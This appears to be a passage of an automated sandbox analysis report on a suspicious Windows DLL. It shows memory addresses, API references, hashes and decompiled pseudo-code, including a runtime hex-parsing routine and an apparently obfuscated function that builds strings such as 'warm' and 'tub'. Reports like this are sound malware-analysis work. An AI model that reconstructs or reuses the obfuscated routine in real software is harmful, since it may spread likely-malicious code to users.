0x6e19dab9
0x6e19dabb
0x6e19dabe
0x6e19dabe
0x6e19dac7
0x6e19dac9
0x6e19dacb
0x6e19dace
0x6e19dad0
0x6e19dad1
0x6e19dad7
0x6e19dada
0x6e19dae0
0x6e19daed
0x6e19daf2
0x6e19dafa
0x6e19dafa
0x6e19dafd
0x6e19daff
0x6e19db05
0x6e19db09
0x6e19db0c
0x6e19db13
0x6e19db16
0x6e19db22
0x6e19db22
0x00000000
0x00000000
0x00000000
0x6e19d944
0x6e19d944
0x6e19d948
0x6e19d94a
0x6e19d94c
0x6e19d94c
0x6e19d95a
0x6e19d964
0x6e19d9b9
0x6e19d9bc
0x6e19d9bf
0x6e19d9c2
0x6e19d9c5
0x6e19d9c7
0x6e19d9c7
0x6e19d9c9
0x6e19d9cd
0x6e19da2b
0x6e19da2d
0x00000000
0x00000000
0x6e19da2f
0x6e19da35
0x6e19da37
0x6e19da37
0x6e19da3d
0x6e19da42
0x00000000
0x6e19da3f
0x6e19da3f
0x00000000
0x6e19da3f
0x6e19d9cf
0x6e19d9cf
0x6e19d9d7
0x00000000
0x00000000
0x6e19d9d9
0x6e19d9dd
0x6e19d9e1
0x6e19d9e5
0x6e19d9ea
0x6e19d9ee
0x6e19d9f1
0x6e19d9f1
0x6e19d9f4
0x6e19d9fb
0x00000000
0x6e19d9fd
0x6e19da02
0x6e19da07
0x6e19da07
0x00000000
0x6e19da07
0x6e19d9fb
0x6e19d966
0x6e19d96a
0x6e19d970
0x6e19d976
0x6e19d978
0x6e19d985
0x6e19d988
0x6e19d98c
0x6e19d98c
0x6e19d985
0x6e19d996
0x6e19d999
0x6e19d99d
0x6e19d99f
0x6e19d99f
0x6e19d9a6
0x6e19d9ac
0x6e19d9af
0x6e19d9b1
0x6e19d9b1
0x6e19d9b4
0x6e19d9b4
0x6e19d9a6
0x6e19da08
0x6e19da0a
0x6e19da16
0x6e19da1c
0x6e19da1d
0x6e19da25
0x6e19da28
0x00000000
0x6e19da28
0x6e19d8e4
0x6e19d8e4
0x6e19d8e6
0x00000000
0x00000000
0x6e19d8e8
0x6e19d8f7
0x00000000
0x6e19d8f7
0x6e19d847
0x6e19d84b
0x6e19d84b
0x6e19d858
0x00000000
0x6e19d85a
0x6e19d85e
0x6e19d861
0x6e19d867
0x6e19d873
0x6e19d87c
0x6e19d8cc
0x6e19d8cc
0x6e19d8ce
0x00000000
0x00000000
0x6e19d8d2
0x00000000
0x6e19d8d2
0x6e19d882
0x6e19d886
0x6e19d886
0x6e19d88b
0x6e19d893
0x6e19d8ac
0x6e19d8ae
0x6e19d8bb
0x6e19d8bc
0x6e19d8bf
0x6e19d8c5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19d895
0x6e19d899
0x6e19d89d
0x6e19d8a2
0x6e19d8a2
0x6e19d8aa
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19d8aa
0x6e19d893
0x6e19d858
0x6e19d81e
0x6e19d820
0x6e19d820
0x00000000
0x6e19d820
0x6e19d812
0x00000000
0x6e19d7b5
0x6e19d7b9
0x6e19d7bd
0x6e19d7bd
0x6e19d7c2
0x6e19d7ca
0x6e19d7d1
0x6e19d7d5
0x6e19d7d9
0x6e19d7de
0x6e19d7de
0x6e19d7e2
0x6e19d7e6
0x00000000
0x6e19d7e8
0x6e19d7e8
0x00000000
0x6e19d7e8
0x6e19d7cc
0x6e19d7cc
0x6e19d7eb
0x6e19d7f0
0x6e19d7f6
0x00000000
0x6e19d7f6
0x6e19d7ca

APIs

__EH_prolog3_GS.LIBCMT ref: 6E19D70A

Part of subcall function 6E182379: __EH_prolog3.LIBCMT ref: 6E182380
Part of subcall function 6E182379: std::_Lockit::_Lockit.LIBCPMT ref: 6E18238B
Part of subcall function 6E182379: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1823FB

_Find_elem.LIBCPMT ref: 6E19D95A

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E19D781

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: ff1a04ae7694c66dc9bbd0b44c2c0f3bf6cc1e24681394c0e1223010f4c2c063
Instruction ID: 27aefc7404a9ecfa69435b7826bb4ded17a41bb9dedb97a8e34cface17afed58
Opcode Fuzzy Hash: ff1a04ae7694c66dc9bbd0b44c2c0f3bf6cc1e24681394c0e1223010f4c2c063
Instruction Fuzzy Hash: A7D1BF31E082598EDF15DBE8C8507ECBBB2BF55314F64849AD8896B282DB3488C5FF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19D2DD, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E19D2DD(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t137;
				intOrPtr* _t138;
				intOrPtr* _t144;
				void* _t155;
				signed int _t156;
				void* _t166;
				void* _t169;
				signed int _t172;
				void* _t173;
				void* _t174;
				signed int _t185;
				signed int _t191;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t217;
				signed int _t219;
				intOrPtr _t234;
				intOrPtr* _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				void* _t263;
				void* _t264;

				_t264 = __eflags;
				E6E1A9DF3(0x6e1ecdb4, __ebx, __edi, __esi, 0x88);
				_t197 =  *((intOrPtr*)(_t263 + 0x10));
				 *(_t263 - 0x88) =  *(_t263 + 0xc);
				 *((intOrPtr*)(_t263 - 0x8c)) =  *((intOrPtr*)(_t263 + 0x14));
				_t137 =  *(_t263 + 0x1c);
				 *(_t263 - 0x80) = _t137;
				_t138 = E6E19965D(_t197, __edi, __esi, _t264);
				_t251 = _t138;
				_t256 =  *((intOrPtr*)( *_t138 + 0x14));
				 *0x6e1ee1b4(_t263 - 0x78, _t137);
				 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))();
				 *(_t263 - 4) =  *(_t263 - 4) & 0x00000000;
				_t265 =  *((intOrPtr*)(_t263 - 0x68));
				if( *((intOrPtr*)(_t263 - 0x68)) != 0) {
					 *(_t263 - 0x94) = E6E196B51(_t251) & 0x0000ffff;
				} else {
					 *(_t263 - 0x94) =  *(_t263 - 0x94) & 0x00000000;
				}
				_t144 = E6E198E37(_t197, _t251, _t256, _t265);
				 *0x6e1ee1b4("0123456789ABCDEFabcdef-+Xx", 0x6e1f240b, _t263 - 0x48,  *(_t263 - 0x80));
				 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 0x2c))))();
				_t258 =  *(_t263 - 0x88);
				 *(_t263 - 0x84) = _t258;
				if(E6E1979C2(_t197,  *((intOrPtr*)(_t263 - 0x8c))) == 0) {
					L13:
					_t260 =  *(_t263 + 0x18) & 0x00000e00;
					_t253 = 0xa;
					 *(_t263 - 0x80) = _t253;
					if(_t260 != 0x400) {
						__eflags = _t260 - 0x800;
						if(_t260 != 0x800) {
							asm("sbb esi, esi");
							_t262 =  ~_t260 & _t253;
							__eflags = _t262;
							L19:
							 *((char*)(_t263 - 0x7a)) = 0;
							if(E6E1979C2(_t197,  *((intOrPtr*)(_t263 - 0x8c))) == 0) {
								L35:
								 *((char*)(_t263 - 0x79)) = 0;
								 *((char*)(_t263 - 0x90)) = 0;
								__eflags = _t262;
								if(_t262 == 0) {
									L38:
									 *(_t263 - 0x50) =  *(_t263 - 0x50) & 0x00000000;
									 *((intOrPtr*)(_t263 - 0x4c)) = 0xf;
									 *(_t263 - 0x60) = 0;
									E6E1958BE(_t263 - 0x60, 1,  *((intOrPtr*)(_t263 - 0x90)));
									_t254 = 0;
									 *(_t263 - 4) = 1;
									 *((intOrPtr*)(_t263 - 0x90)) =  *(_t263 - 0x88) + 0x1f;
									_t155 = E6E1979C2(_t197,  *((intOrPtr*)(_t263 - 0x8c)));
									_pop(_t216);
									if(_t155 == 0) {
										_t217 =  *((intOrPtr*)(_t263 - 0x4c));
										_t156 =  *(_t263 - 0x60);
										L69:
										_t198 =  *((intOrPtr*)(_t263 - 0x79));
										L70:
										_t245 = _t263 - 0x78;
										if( *((intOrPtr*)(_t263 - 0x64)) >= 0x10) {
											_t245 =  *((intOrPtr*)(_t263 - 0x78));
										}
										if(_t198 == 0) {
											L87:
											_t246 =  *(_t263 - 0x88);
											goto L88;
										} else {
											while(_t254 != 0) {
												_t200 =  *_t245;
												if(_t200 == 0x7f) {
													break;
												}
												_t254 = _t254 - 1;
												if(_t254 == 0) {
													L79:
													if(_t254 != 0) {
														L83:
														if( *((char*)(_t245 + 1)) > 0) {
															_t245 = _t245 + 1;
														}
														continue;
													}
													 *(_t263 - 0x80) = _t263 - 0x60;
													if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
														 *(_t263 - 0x80) = _t156;
													}
													_t217 =  *((intOrPtr*)(_t263 - 0x4c));
													if(_t200 <  *( *(_t263 - 0x80))) {
														goto L87;
													} else {
														goto L83;
													}
												}
												 *(_t263 - 0x80) = _t263 - 0x60;
												if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
													 *(_t263 - 0x80) = _t156;
												}
												_t217 =  *((intOrPtr*)(_t263 - 0x4c));
												if(_t200 !=  *((intOrPtr*)( *(_t263 - 0x80) + _t254))) {
													goto L87;
												} else {
													goto L79;
												}
											}
											__eflags =  *((char*)(_t263 - 0x7a));
											_t246 =  *(_t263 - 0x84);
											if( *((char*)(_t263 - 0x7a)) == 0) {
												 *_t246 = 0x30;
												_t246 = _t246 + 1;
											}
											L88:
											 *_t246 = 0;
											__eflags = _t217 - 0x10;
											if(_t217 >= 0x10) {
												_t219 = _t217 + 1;
												 *(_t263 - 0x88) = _t156;
												 *(_t263 - 0x80) = _t219;
												__eflags = _t219 - 0x1000;
												if(_t219 >= 0x1000) {
													E6E1616BA(0, _t254, _t263, _t263 - 0x88, _t263 - 0x80);
													_t156 =  *(_t263 - 0x88);
													_t219 =  *(_t263 - 0x80);
												}
												_push(_t219);
												E6E1A99DB(_t156);
											}
											 *(_t263 - 0x50) = 0;
											 *((intOrPtr*)(_t263 - 0x4c)) = 0xf;
											 *(_t263 - 0x60) = 0;
											E6E17FB57(_t263 - 0x78);
											return E6E1A9D9D(_t262, 0, _t254, _t262);
										}
									} else {
										goto L39;
									}
									do {
										L39:
										if( *((char*)(_t197 + 4)) == 0) {
											_t216 = _t197;
											E6E1A04F4(_t197);
										}
										_t166 = E6E197A43(_t216, _t263 - 0x48,  *(_t197 + 6) & 0x0000ffff);
										if(_t166 >=  *(_t263 - 0x80)) {
											_t217 =  *((intOrPtr*)(_t263 - 0x4c));
											_t247 = _t263 - 0x60;
											_t156 =  *(_t263 - 0x60);
											__eflags = _t217 - 0x10;
											if(_t217 >= 0x10) {
												_t247 = _t156;
											}
											__eflags =  *((char*)(_t247 + _t254));
											if( *((char*)(_t247 + _t254)) == 0) {
												L62:
												if(_t254 == 0) {
													goto L69;
												}
												_t248 = _t263 - 0x60;
												if(_t217 >= 0x10) {
													_t248 = _t156;
												}
												if( *((char*)(_t248 + _t254)) <= 0) {
													_t198 = 0;
													goto L70;
												} else {
													_t254 = _t254 + 1;
													goto L69;
												}
											} else {
												__eflags =  *(_t263 - 0x94);
												if( *(_t263 - 0x94) == 0) {
													goto L62;
												}
												__eflags =  *((char*)(_t197 + 4));
												_t249 =  *(_t197 + 6) & 0x0000ffff;
												if( *((char*)(_t197 + 4)) == 0) {
													E6E1A04F4(_t197);
													_t249 =  *(_t197 + 6) & 0x0000ffff;
													_t217 =  *((intOrPtr*)(_t263 - 0x4c));
													_t156 =  *(_t263 - 0x60);
												}
												__eflags = _t249 -  *(_t263 - 0x94);
												if(_t249 !=  *(_t263 - 0x94)) {
													goto L62;
												} else {
													E6E183F1C(_t263 - 0x60, 0);
													_t254 = _t254 + 1;
													__eflags = _t254;
													goto L60;
												}
											}
										} else {
											_t234 =  *((intOrPtr*)(_t166 + "0123456789ABCDEFabcdef-+Xx"));
											_t172 =  *(_t263 - 0x84);
											 *_t172 = _t234;
											if( *((char*)(_t263 - 0x7a)) != 0 || _t234 != 0x30) {
												if(_t172 <  *((intOrPtr*)(_t263 - 0x90))) {
													 *((char*)(_t263 - 0x7a)) = 1;
													 *(_t263 - 0x84) = _t172 + 1;
												}
											}
											_t173 = _t263 - 0x60;
											 *((char*)(_t263 - 0x79)) = 1;
											if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
												_t173 =  *(_t263 - 0x60);
											}
											if( *((char*)(_t173 + _t254)) != 0x7f) {
												_t174 = _t263 - 0x60;
												if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
													_t174 =  *(_t263 - 0x60);
												}
												 *((char*)(_t174 + _t254)) =  *((char*)(_t174 + _t254)) + 1;
											}
										}
										L60:
										E6E19F3B2(_t197);
										_t169 = E6E1979C2(_t197,  *((intOrPtr*)(_t263 - 0x8c)));
										_pop(_t216);
									} while (_t169 != 0);
									_t217 =  *((intOrPtr*)(_t263 - 0x4c));
									_t156 =  *(_t263 - 0x60);
									goto L62;
								}
								L36:
								__eflags = _t262 - _t253;
								if(_t262 == _t253) {
									goto L38;
								}
								L37:
								 *(_t263 - 0x80) = ((0 | _t262 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((char*)(_t197 + 4)) == 0) {
								E6E1A04F4(_t197);
							}
							if(( *(_t197 + 6) & 0x0000ffff) !=  *((intOrPtr*)(_t263 - 0x48))) {
								goto L35;
							} else {
								 *((char*)(_t263 - 0x79)) = 1;
								 *((char*)(_t263 - 0x90)) = 1;
								E6E19F3B2(_t197);
								E6E1979C2(_t197,  *((intOrPtr*)(_t263 - 0x8c)));
								if(1 == 0) {
									L33:
									__eflags = _t262;
									if(_t262 != 0) {
										goto L36;
									}
									_t262 = 8;
									goto L37;
								}
								if( *((char*)(_t197 + 4)) == 0) {
									E6E1A04F4(_t197);
								}
								_t185 =  *(_t197 + 6) & 0x0000ffff;
								if(_t185 ==  *((intOrPtr*)(_t263 - 0x16))) {
									L30:
									if(_t262 == 0 || _t262 == 0x10) {
										_t262 = 0x10;
										 *((char*)(_t263 - 0x79)) = 0;
										 *((char*)(_t263 - 0x90)) = 0;
										E6E19F3B2(_t197);
										goto L37;
									} else {
										goto L36;
									}
								} else {
									if( *((char*)(_t197 + 4)) == 0) {
										E6E1A04F4(_t197);
										_t185 =  *(_t197 + 6) & 0x0000ffff;
									}
									if(_t185 !=  *((intOrPtr*)(_t263 - 0x18))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t262);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((char*)(_t197 + 4)) == 0) {
						E6E1A04F4(_t197);
					}
					_t191 =  *(_t197 + 6) & 0x0000ffff;
					if(_t191 !=  *((intOrPtr*)(_t263 - 0x1a))) {
						__eflags =  *((char*)(_t197 + 4));
						if( *((char*)(_t197 + 4)) == 0) {
							E6E1A04F4(_t197);
							_t191 =  *(_t197 + 6) & 0x0000ffff;
						}
						__eflags = _t191 -  *((intOrPtr*)(_t263 - 0x1c));
						if(_t191 !=  *((intOrPtr*)(_t263 - 0x1c))) {
							goto L13;
						} else {
							 *_t258 = 0x2d;
							goto L12;
						}
					} else {
						 *_t258 = 0x2b;
						L12:
						 *(_t263 - 0x84) = _t258 + 1;
						E6E19F3B2(_t197);
						goto L13;
					}
				}
			}

0x6e19d2dd
0x6e19d2e7
0x6e19d2ef
0x6e19d2f2
0x6e19d2fb
0x6e19d301
0x6e19d305
0x6e19d308
0x6e19d30d
0x6e19d316
0x6e19d31b
0x6e19d323
0x6e19d325
0x6e19d329
0x6e19d32d
0x6e19d342
0x6e19d32f
0x6e19d32f
0x6e19d32f
0x6e19d34b
0x6e19d368
0x6e19d370
0x6e19d378
0x6e19d381
0x6e19d390
0x6e19d3d8
0x6e19d3dd
0x6e19d3e3
0x6e19d3e4
0x6e19d3ed
0x6e19d3f3
0x6e19d3f9
0x6e19d402
0x6e19d404
0x6e19d404
0x6e19d406
0x6e19d40c
0x6e19d41a
0x6e19d4b2
0x6e19d4b4
0x6e19d4b7
0x6e19d4bd
0x6e19d4bf
0x6e19d4d7
0x6e19d4dd
0x6e19d4e6
0x6e19d4ed
0x6e19d4f1
0x6e19d4fc
0x6e19d507
0x6e19d50c
0x6e19d512
0x6e19d518
0x6e19d51b
0x6e19d623
0x6e19d626
0x6e19d629
0x6e19d629
0x6e19d62c
0x6e19d630
0x6e19d633
0x6e19d635
0x6e19d635
0x6e19d63a
0x6e19d69e
0x6e19d69e
0x00000000
0x6e19d63c
0x6e19d63c
0x6e19d640
0x6e19d645
0x00000000
0x00000000
0x6e19d647
0x6e19d64a
0x6e19d666
0x6e19d668
0x6e19d683
0x6e19d687
0x6e19d689
0x6e19d689
0x00000000
0x6e19d687
0x6e19d671
0x6e19d674
0x6e19d676
0x6e19d676
0x6e19d67e
0x6e19d681
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19d681
0x6e19d653
0x6e19d656
0x6e19d658
0x6e19d658
0x6e19d661
0x6e19d664
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19d664
0x6e19d68c
0x6e19d690
0x6e19d696
0x6e19d698
0x6e19d69b
0x6e19d69b
0x6e19d6a4
0x6e19d6a6
0x6e19d6a8
0x6e19d6ab
0x6e19d6ad
0x6e19d6ae
0x6e19d6b4
0x6e19d6b7
0x6e19d6bd
0x6e19d6ca
0x6e19d6cf
0x6e19d6d7
0x6e19d6d7
0x6e19d6da
0x6e19d6dc
0x6e19d6e2
0x6e19d6e6
0x6e19d6e9
0x6e19d6f0
0x6e19d6f3
0x6e19d6ff
0x6e19d6ff
0x00000000
0x00000000
0x00000000
0x6e19d521
0x6e19d521
0x6e19d525
0x6e19d527
0x6e19d529
0x6e19d529
0x6e19d537
0x6e19d541
0x6e19d596
0x6e19d599
0x6e19d59c
0x6e19d59f
0x6e19d5a2
0x6e19d5a4
0x6e19d5a4
0x6e19d5a6
0x6e19d5aa
0x6e19d608
0x6e19d60a
0x00000000
0x00000000
0x6e19d60c
0x6e19d612
0x6e19d614
0x6e19d614
0x6e19d61a
0x6e19d61f
0x00000000
0x6e19d61c
0x6e19d61c
0x00000000
0x6e19d61c
0x6e19d5ac
0x6e19d5ac
0x6e19d5b4
0x00000000
0x00000000
0x6e19d5b6
0x6e19d5ba
0x6e19d5be
0x6e19d5c2
0x6e19d5c7
0x6e19d5cb
0x6e19d5ce
0x6e19d5ce
0x6e19d5d1
0x6e19d5d8
0x00000000
0x6e19d5da
0x6e19d5df
0x6e19d5e4
0x6e19d5e4
0x00000000
0x6e19d5e4
0x6e19d5d8
0x6e19d543
0x6e19d547
0x6e19d54d
0x6e19d553
0x6e19d555
0x6e19d562
0x6e19d565
0x6e19d569
0x6e19d569
0x6e19d562
0x6e19d573
0x6e19d576
0x6e19d57a
0x6e19d57c
0x6e19d57c
0x6e19d583
0x6e19d589
0x6e19d58c
0x6e19d58e
0x6e19d58e
0x6e19d591
0x6e19d591
0x6e19d583
0x6e19d5e5
0x6e19d5e7
0x6e19d5f3
0x6e19d5f9
0x6e19d5fa
0x6e19d602
0x6e19d605
0x00000000
0x6e19d605
0x6e19d4c1
0x6e19d4c1
0x6e19d4c3
0x00000000
0x00000000
0x6e19d4c5
0x6e19d4d4
0x00000000
0x6e19d4d4
0x6e19d424
0x6e19d428
0x6e19d428
0x6e19d435
0x00000000
0x6e19d437
0x6e19d43b
0x6e19d43e
0x6e19d444
0x6e19d450
0x6e19d459
0x6e19d4a9
0x6e19d4a9
0x6e19d4ab
0x00000000
0x00000000
0x6e19d4af
0x00000000
0x6e19d4af
0x6e19d45f
0x6e19d463
0x6e19d463
0x6e19d468
0x6e19d470
0x6e19d489
0x6e19d48b
0x6e19d498
0x6e19d499
0x6e19d49c
0x6e19d4a2
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19d472
0x6e19d476
0x6e19d47a
0x6e19d47f
0x6e19d47f
0x6e19d487
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19d487
0x6e19d470
0x6e19d435
0x6e19d3fb
0x6e19d3fd
0x6e19d3fd
0x00000000
0x6e19d3fd
0x6e19d3ef
0x00000000
0x6e19d392
0x6e19d396
0x6e19d39a
0x6e19d39a
0x6e19d39f
0x6e19d3a7
0x6e19d3ae
0x6e19d3b2
0x6e19d3b6
0x6e19d3bb
0x6e19d3bb
0x6e19d3bf
0x6e19d3c3
0x00000000
0x6e19d3c5
0x6e19d3c5
0x00000000
0x6e19d3c5
0x6e19d3a9
0x6e19d3a9
0x6e19d3c8
0x6e19d3cd
0x6e19d3d3
0x00000000
0x6e19d3d3
0x6e19d3a7

APIs

__EH_prolog3_GS.LIBCMT ref: 6E19D2E7

Part of subcall function 6E19965D: __EH_prolog3.LIBCMT ref: 6E199664
Part of subcall function 6E19965D: std::_Lockit::_Lockit.LIBCPMT ref: 6E19966E
Part of subcall function 6E19965D: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1996DF

_Find_elem.LIBCPMT ref: 6E19D537

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E19D35E

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: 662fc173c3a7d739cfbf193fbebee4745b38d854c5e4bd8f829273eaacb8e91f
Instruction ID: e5355231673fba70efebd8c6a46f3cb8a5b2f2cde9f6ed598db6c51b19f7d68a
Opcode Fuzzy Hash: 662fc173c3a7d739cfbf193fbebee4745b38d854c5e4bd8f829273eaacb8e91f
Instruction Fuzzy Hash: 71D18D71E042598AEF11DFE8C8507ECBBB2BF15304F64809AD499AB282DB3499C5FF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E17DC30, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E17DC30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t57;
				signed short _t58;
				intOrPtr _t61;
				signed char _t64;
				signed short _t65;
				signed short _t82;
				signed int _t83;
				intOrPtr _t84;
				signed short _t90;
				signed short _t92;
				signed int _t106;
				signed char _t109;
				signed short _t111;
				signed int _t121;
				intOrPtr* _t123;
				intOrPtr _t124;
				intOrPtr _t127;
				signed short _t132;
				void* _t137;
				signed char _t139;
				intOrPtr _t142;
				intOrPtr _t152;
				void* _t154;
				signed short _t158;
				signed short _t159;
				signed int _t160;
				intOrPtr _t164;
				signed char _t167;
				signed int _t169;
				signed char _t172;
				signed char _t173;
				signed int _t176;
				intOrPtr _t177;
				signed short _t178;
				intOrPtr _t179;
				void* _t184;
				intOrPtr* _t185;
				void* _t189;
				signed short _t192;

				_t117 = __ebx;
				E6E1A9DF3(0x6e1e9c9f, __ebx, __edi, __esi, 0xe4);
				_t152 =  *0x6e2189a0; // 0xf24087a
				_t154 = _t152 + 0x6893 +  *0x6e218988;
				_t57 = 0;
				asm("adc eax, [0x6e21898c]");
				 *(_t184 - 0x34) = _t57;
				_t58 =  *0x6e2189f0; // 0xc8c83700
				_t169 = _t58 - _t154 - 0x00000002 & 0x0000ffff;
				_t61 =  *0x6e218984; // 0xf02e13b7
				 *0x6e218984 = _t61 + 0x24 + _t154 -  *0x6e2189f0;
				_t64 = E6E17D121( *0x6e2189a4 & 0x000000ff);
				 *0x6e21898c =  *0x6e21898c & 0x00000000;
				_t176 = _t169;
				 *0x6e218988 = _t64;
				_t65 =  *0x6e2189f0; // 0xc8c83700
				_t121 =  *0x6e221af0; // 0x9
				 *0x6e2189f0 = _t65 + 0xb + _t176 - _t64;
				_t69 =  *0x6e238be4;
				if( *0x6e238be4 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t121 * 4)) + 4))) {
					E6E1A9533(_t69, 0x6e238be4);
					__eflags =  *0x6e238be4 - 0xffffffff;
					_pop(_t123);
					if(__eflags == 0) {
						 *(_t184 - 4) =  *(_t184 - 4) & 0x00000000;
						_push(_t123);
						E6E18155B(__ebx, _t123, _t169, _t176, __eflags);
						E6E1A99C6(_t123, __eflags, E6E1ED65D);
						 *(_t184 - 4) =  *(_t184 - 4) | 0xffffffff;
						 *_t185 = 0x6e238be4;
						E6E1A94E9(_t123);
					}
				}
				_t124 =  *0x6e2189a0; // 0xf24087a
				 *0x6e2189f0 =  *0x6e2189f0 + _t124 + 0x6893;
				_push(_t184 - 0x60);
				E6E1815AC(_t117, _t169, _t176);
				 *(_t184 - 4) = 1;
				E6E17ECE1(_t184 - 0x28, "warm");
				 *(_t184 - 4) = 2;
				_t189 =  *0x6e2189f0 - _t176; // 0xc8c83700
				if(_t189 >= 0) {
					_t167 =  *0x6e218988; // 0xfbec8649
					_t169 = _t169 + 0x6893 + _t167;
					 *0x6e21899f = (_t167 & 0x000000ff) * ( *0x6e21899f & 0x000000ff);
				}
				_t127 =  *0x6e2189a0; // 0xf24087a
				_t158 = (_t169 & 0x0000ffff) - _t127 + 0xffffffba;
				 *0x6e2189f0 = _t158;
				if(( *0x6e218999 & 0x000000ff) <= _t127) {
					 *0x6e21898c =  *0x6e21898c & 0x00000000;
					 *0x6e218994 = _t158;
					_t109 = _t127 - _t158 + 0xc;
					 *0x6e218988 = _t109;
					_t111 = _t109 - _t127 - 0x46;
					_t192 = _t111;
					 *0x6e2189f0 = _t111;
				}
				_push(_t127);
				_push("tub");
				E6E17E808(_t117, _t184 - 0x4c, _t169, _t176, _t192);
				 *(_t184 - 4) = 3;
				_t177 =  *0x6e2189a0; // 0xf24087a
				_t159 =  *0x6e2189f0; // 0xc8c83700
				_t11 = _t177 + 0x19b4; // 0xf24222e
				 *(_t184 - 0x2c) = _t11 + _t169 * 0x00000002 + _t159 & 0x0000ffff;
				if(( *0x6e21899c & 0x000000ff) - ( *0x6e218992 & 0x000000ff) != 0x27f) {
					_t159 = ( *0x6e218996 & 0x000000ff) - _t177 - 0x46;
				}
				_t82 =  *(_t184 - 0x2c);
				if(( *0x6e218999 & 0x000000ff) <= _t159) {
					 *0x6e218994 = _t82;
					_t82 = 0xffba;
				}
				 *0x6e21898c =  *0x6e21898c & 0x00000000;
				_t172 = ( *0x6e2189a4 & 0x000000ff) -  *0x6e218984 - 0x46;
				_t160 =  *0x6e218995 & 0x000000ff;
				_t83 = _t82 & 0x0000ffff;
				 *(_t184 - 0x34) = _t83;
				 *0x6e218988 = _t172;
				 *(_t184 - 0x30) = _t160;
				_t132 = _t83 * 7 - _t177;
				_t84 = 0;
				 *(_t184 - 0x2c) = _t132;
				 *0x6e2189f0 = _t132;
				 *0x6e222b18 = 0;
				do {
					if(_t177 == _t160) {
						goto L13;
					}
					_t19 = _t84 + 0x6e218990; // 0x866d3c9e
					asm("cdq");
					_t177 = _t177 - _t132 - 0xb + ( *_t19 & 0x000000ff);
					asm("adc ecx, edx");
					_t172 = _t172 - _t177;
					 *0x6e218988 = _t172;
					asm("sbb [0x6e21898c], ecx");
					_t132 =  *(_t184 - 0x2c);
					if(_t132 == ( *0x6e21899a & 0x000000ff)) {
						break;
					}
					_t84 =  *0x6e222b18; // 0x1
					_t177 =  *0x6e2189a0; // 0xf24087a
					_t160 =  *(_t184 - 0x30);
					L13:
					_t84 = _t84 + 1;
					 *0x6e222b18 = _t84;
				} while (_t84 < 0x21);
				_t135 =  >=  ?  *((void*)(_t184 - 0x28)) : _t184 - 0x28;
				_t88 =  *((intOrPtr*)(_t184 - 0x18)) + ( >=  ?  *((void*)(_t184 - 0x28)) : _t184 - 0x28);
				_t137 =  >=  ?  *((void*)(_t184 - 0x28)) : _t184 - 0x28;
				_push(_t137);
				_push(_t184 - 0x4c);
				_push( *((intOrPtr*)(_t184 - 0x18)) + ( >=  ?  *((void*)(_t184 - 0x28)) : _t184 - 0x28));
				_push(_t137);
				E6E17E722(_t117, _t184 - 0xf0, _t172, _t177,  *((intOrPtr*)(_t184 - 0x14)) - 0x10);
				 *(_t184 - 4) = 4;
				_t90 =  *0x6e2189f0; // 0xc8c83700
				_t139 =  *0x6e218988; // 0xfbec8649
